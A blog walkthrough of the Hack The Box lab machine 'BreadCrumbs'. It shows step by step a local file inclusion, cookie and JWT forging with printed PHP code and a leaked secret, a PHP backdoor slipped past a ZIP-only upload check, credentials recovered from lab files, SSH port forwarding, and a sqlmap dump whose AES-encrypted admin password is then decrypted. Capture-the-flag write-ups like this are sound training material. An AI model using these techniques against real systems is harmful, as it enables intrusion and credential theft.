Home Hackthebox BreadCrumbs walkthrough
Post
Cancel

Hackthebox BreadCrumbs walkthrough

1

Methodology

  • Enumeration by LFI
  • Phpsessid and Jwt token forge
  • unrestricted upload
  • Database leak
  • Binary file analysis
  • Port forwarding
  • Database dump with SQLMAP
┌──(root💀m19o)-[~/HTB/Breadcrumbs]
└─# nmap -sV -v -p- --min-rate=10000 10.10.10.228
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH for_Windows_7.7 (protocol 2.0)
80/tcp open http Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1h PHP/8.0.1)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
443/tcp open ssl/http Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1h PHP/8.0.1)
445/tcp open microsoft-ds?
3306/tcp open mysql?
5040/tcp open unknown
7680/tcp open pando-pub?
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3306-TCP:V=7.91%I=7%D=2/23%Time=6034FA27%P=x86_64-pc-linux-gnu%r(RP
SF:CCheck,4A,"F\0\0\x01\xffj\x04Host\x20'10\.10\.14\.12'\x20is\x20not\x20a
SF:llowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(X11Probe
SF:,4A,"F\0\0\x01\xffj\x04Host\x20'10\.10\.14\.12'\x20is\x20not\x20allowed
SF:\x20to\x20connect\x20to\x20this\x20MariaDB\x20server");
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Enumeration


2

As a penetartion tester you should analyze the application to understand the functionality of it

So now let`s check what that button does.

3

From that page we can understand that the application is for reading books and that button checks for books with title and author name

Let`s see how does the application search for books

4

So i started to test the searching with random word, in my case i used test to understand the behavior

I got nothing from that, so i will start my proxy "Burpsuite" to intercept that request

5

After intercepting the request as you can see there is another parameter called "method" we couldn`t see before, now let`s change method value to 1

6

I managed to generate an error by changing the method value to 1

The first line error says there is a missing key in the array called book and the second line error says that file_get_content method can`t find the file, so what if we gave it a file to open ?

paul

So now we got LFI , Files.php says that we need to get paul session to login

Let`s see how this application generates a cookie

7

So now we got the code that generates the cookie, let`s get paul`s cookie

$username="paul";

$max =3;

$seed = rand(0, $max);

foreach (range(0, $max) as $seed) {

$key = "s4lTy_stR1nG_".$username[$seed]."(!528./9890";

$session_cookie = $username.md5($key);

}

echo $session_cookie;>
paul47200b180ccd6835d25d034eeb6e6390

Now we got our cookie

Let`s change it and login

admin-login

Now we got access

Let`s check all the tabs and see what we can get

upload

So i can upload now ! , Let`s check how it works

token

It says there is a key called token is missing, i need to generate a token , let`s see how we can have one.

Login-php

As you can see login.php uses authController.php to validate , now let`s see authcontroller.php content.

8

Now i can generate our token

To generate a token we need payload and secret key as mentioned , out payload load is a Multidimensional Array , { "data" { "username" : "paul" } }

$secret_key = '6cb9c1a2786a483ca5e44571dcc5f3bfa298593a6376ad92185c3258acd5591e';

<

 Token= eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjp7InVzZXJuYW1lIjoicGF1bCJ9fQ.7pc5S1P76YsrWhi_gu23bzYLYWxqORkr0WtEz_IUtCU

generate-token

Let`s upload the backdoor

It accepts ZIP files only, so upload a zip file and change it`s content with PHP backdoor and change the tipe to PHP in the filename and in the end of the request too

backdoor


Bingo

Foothold

Let`s start enumeration from inside, Upload dir is "Portal/Uploads" you will find your backdoor there

enumeration

There is an interesting fold name pizzaDeliveryUserData, let`s check it.

users

That`s juicy, All users data but it looks like that only one user is enabled, that user is juliette, let`s check that file.

juliette

Got creds now !!

creds

User Flag

user

Let`s continue enumeration

user

Microsoft stickynote contains juciy info, let`s check it

sqliite

Database files we need to open it on our machine to check it

You can download the files with more than way, use what you like

In my case i used SCP to get the files

Usage :

scp "file you want to download" user@0.0.0.0:path "Your ip and where you want to download it"

Lateral Movment

After downloading the files look What i got !

juliette: jUli901./())!
development: fN3)sN5Ee@g
administrator: [MOVED]

sqliite

Laterl Movment DONE

laterl

Privilege Escalation

What Development user have for?

krypter-linux

I tried type ./Krypter_linux and that what it gave me

Admin-PASS

That`s looks like a SQL statement, we need SQLMAP NOW !!

Admin-PASS

PS C:\Development> curl 'http://127.0.0.1:1234/index.php?method=select&username=administrator&table=passwords' -UseBasicParsing


StatusCode : 200
StatusDescription : OK
Content : selectarray(1) {
[0]=>
array(1) {
["aes_key"]=>
string(16) "k19D193j.<19391("
}
}

RawContent : HTTP/1.1 200 OK
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Length: 96
Content-Type: text/html; charset=UTF-8
Date: Tue, 23 Feb 2021 19:24:09 GMT
Server: Apache/2.4.46 (Win64) ...
Forms :
Headers : {[Keep-Alive, timeout=5, max=100], [Connection, Keep-Alive], [Content-Length, 96], [Content-Type,
text/html; charset=UTF-8]...}
Images : {}
InputFields : {}
Links : {}
ParsedHtml :
RawContentLength : 96

To use SQLMAP we need to use port forwarding

In my case i used SSH

ssh -N -L 1234:127.0.0.1:1234 development@10.10.10.228

┌──(root💀kali)-[~/HTB/Breadcrumbs]
└─# curl 'http://127.0.0.1:1234/index.php?method=select&username=administrator&table=passwords'
selectarray(1) {
[0]=>
array(1) {
["aes_key"]=>
string(16) "k19D193j.<19391("
}
}

Let`s ROLL

sqlmap -u http://127.0.0.1:1234/index.php\?method\=select\&username\=administrator\&table\=passwords --dump

Database: bread
Table: passwords
[1 entry]
+----+---------------+------------------+----------------------------------------------+
| id | account | aes_key | password |
+----+---------------+------------------+----------------------------------------------+
| 1 | Administrator | k19D193j.<19391( | H2dFz/jNwtSTWDURot9JBhWMP6XOdmcpgqvYHG35QKw= |
+----+---------------+------------------+----------------------------------------------+

Now we need to decrypt the password

So we need to use base64 decode and after that we need to use aes decrypt with the key we got


You can use this link to decrypt it

https://gchq.github.io/CyberChef/#recipe=From_Base64('A-Za-z0-9%2B/%3D',false)AES_Decrypt(%7B'option':'Latin1','string':'k19D193j.%3C19391('%7D,%7B'option':'Hex','string':'0000000000000000000000000000000'%7D,'CBC','Raw','Raw',%7B'option':'Hex','string':''%7D,%7B'option':'Hex','string':'undefined'%7D)&input=SDJkRnovak53dFNUV0RVUm90OUpCaFdNUDZYT2RtY3BncXZZSEczNVFLdz0

ROOT Flag

ROOT

ROOT

This post is licensed under CC BY 4.0 by the author.